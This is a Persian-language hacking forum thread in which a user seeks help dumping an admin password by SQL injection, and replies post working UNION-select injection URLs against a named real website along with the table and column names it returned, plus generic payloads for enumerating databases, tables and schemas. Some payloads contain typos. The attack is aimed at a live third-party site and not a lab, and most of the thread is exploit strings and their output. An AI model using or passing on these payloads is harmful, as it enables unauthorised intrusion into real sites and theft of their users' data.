رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

سلام خدمت همه دوستان

 

من یه تارگت تمرینی از بخش تارگت های تمرین برداشتم که تست کنم میتونم رمز ادمین رو بزنم ولی هر کاری میکنم انگار نمیشه یا من درست نمیرم دارم به ترتیب فیلم عمل میکنم ولی انگار یه جایی لقی میزنم نمیدونم کجا ..

تعدا ستون هارو پیدا کردم

ستونی که آسیب پذیره رو پیدا کردم

ورژن رو پیدا میکنم

با دستور groub_concat تیبل های دیتابیس information_schema رو بیرون می کشیم ولی از اینجا به بعدش برام خیلی مبهمه نمیدونم باید چطور پیش بره هر چه قدرم فیلم نگاه میکنم نمیدونم چجوره

اگه امکانش هست یکی از دوستان بیاد اینکارو بکنه وهر مراحلی رو که میره رو برام توی همین تاپیک توضیح بده با این تارگتی که خودم میدم اینکارو بکنه واقعا ممنون میشم

www.cardelicious.com/index.php?page=collection&collection=&cid=53

 

تشکر

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر


http://www.cardelicious.com/index.php?page=collection&collection=&cid=53+union+select+1,2,3,group_concat(table_name),5,6,7,8+from+information_schema.tables--


CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,background,blog_commentmeta,blog_comments,blog_links,blog_options,blog_postmeta,blog_posts,blog_term_relationships,blog_term_taxonomy,blog_terms,blog_usermeta,blog_users,boxes,card_cards,card_collections,card_sub_collections,card_to_collection,card_topright,cards,collections,json_cache,slides,sub_collections,tweet_mentions,tweet_tags,tweet_urls,tweets,users


http://www.cardelicious.com/index.php?page=collection&collection=&cid=53+union+select+1,2,3,group_concat(column_name),5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273--


user_id,screen_name,name,profile_image_url,location,url,description,created_at,followers_count,friends_count,statuses_count,time_zone,last_update


http://www.cardelicious.com/index.php?page=collection&collection=&cid=53+union+select+1,2,3,group_concat(user_id),5,6,7,8+from+users--

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

سلام خدمت همه دوستان

 

من یه تارگت تمرینی از بخش تارگت های تمرین برداشتم که تست کنم میتونم رمز ادمین رو بزنم ولی هر کاری میکنم انگار نمیشه یا من درست نمیرم دارم به ترتیب فیلم عمل میکنم ولی انگار یه جایی لقی میزنم نمیدونم کجا ..

تعدا ستون هارو پیدا کردم

ستونی که آسیب پذیره رو پیدا کردم

ورژن رو پیدا میکنم

با دستور groub_concat تیبل های دیتابیس information_schema رو بیرون می کشیم ولی از اینجا به بعدش برام خیلی مبهمه نمیدونم باید چطور پیش بره هر چه قدرم فیلم نگاه میکنم نمیدونم چجوره

اگه امکانش هست یکی از دوستان بیاد اینکارو بکنه وهر مراحلی رو که میره رو برام توی همین تاپیک توضیح بده با این تارگتی که خودم میدم اینکارو بکنه واقعا ممنون میشم

www.cardelicious.com/index.php?page=collection&collection=&cid=53

 

تشکر

توضیحات در انجمن موجوده ولی یه بار د یگه براتون می گم.

سایتایی که از sql استفاده می کنن عموما دوتا دیتابیس دارن،یکی information_schema است که توی همه ی سایتا هست.دیتابیس بعدی اطلاعات سایت توشه.البته سایت می تونه بیشتر از دوتا هم داشته باشه.

شما اول میاید دیتابیس information_schema رو دنبال تیبل مهم می گردین اگر نبود باید برید دیتابیس های دیگه رو بگردین

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

دوست عزیز میتونی بجای اینکعه بری دنبال دیتابیس باشی از دستور لایک استفاده کن

مثلا حدث بزن اسم تیبلی که یوزر پس توشه چیه مثل اینا

user/users/admin/login/member/members/wp_admin-/wp_user//.....

بعد از دستور بشه شکل زیر استفاده کن

site.com/+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_name+like+users--

که میتونی هگز هم کنی

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

دوست عزیز بااین دستر میتونی تیبل های کل دیتابیس روفراخوانی کنی

site.com/+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

با دستور زیر میتونی اسم دیتابیس رو دربیاری

--site.com/+union+select+1,database(),3,4

با دستورزیر میتونی دیتابیس هارو فرا خوانی بکنی

site.com/+unio+select+1,group_concat(sechma_name),3,4+from+information_sechma.sechmata--

بازم سوالی مشکلی بود بپرسین در خدمتم

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

ببخشید من دیگه واقعا گیج شدم خیلی خیلی داغون :( :( :(

الان باید چجوری دیتابیس دیگه رو پیدا کنم ؟؟

اگه میشه رو اون تارگتی که دادم یه توضیح کوتاهی بدین واقعا ممنون میشم

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

دوست عزیز شما ابتدا خوب حملات sql injection رو یاد بگیرین واقعا دوستان توضیحشون عالی بود و.جای تحسین داره بالاخصNET.HUN73R عزیز و در دستوری هم که نوشته بودند کامله و می تونید دیتابیس رو تشخیص بدین خالا گاهی اوقات می بینید برنامه نویسش خیلی زرنگ تر از این حرفاست و تیبلهای دارای اطلاعات خوب رو به اسامی کد نویسی میکنه که براتون بی ارزش هست اما واقعا اطلاعاتی مهم در داخلش هست.

دوستان لطف کنند تنها سوالاتشون رو مطرح کنند نه اینکه تاپیک سوالات به دل نوشته تبدیل بشه و جواب سوال رو گرفتین دیگه ادامش ندید و اگر متوجه نشدین چندین بار خودتون سرچ کنید و برید دنبال یادگیری اگر میخواهید به جایی برسید.

موفق باشید

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

ببخشید بازم

من ستون user,admin,users اینارو پیدا میکنم دیگه نمیتونم برم داخلی اینا رو ببینم یعنی فقط یه مرحله میمونه فکرکنم همون قسمت هاش هست که من اونجا شو گیرم یعنی توی فیلم هرچه قدرنگاه میکنم متوجه نمیشم من ستون ADmin رو باید هاش کنم یا ن باید کار دیگه ایی صورت بگیره

 

 

-اگر تیبل مهمی درش نبود(مثل:admin - user -users -admins  و..) تیبل ها ی دیتابیس های دیگه رو پیدا می کنیم.تارگت ما تیبل مهمی نداشت.

6-کالومن ها رو پیدا می کنیم.توجه کنید که وقتش شما می خواید کالومن ها رو بیرون بکشید باید اسم تیبل به صورت هش باشه.

برای هش کردن به این آدرس برید.

 

این دوقسمت خیلی برام مبهمه نمیدونم یعنی چی؟

هرچه قدر فکر میکنم منظورشو نمیفهمم

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...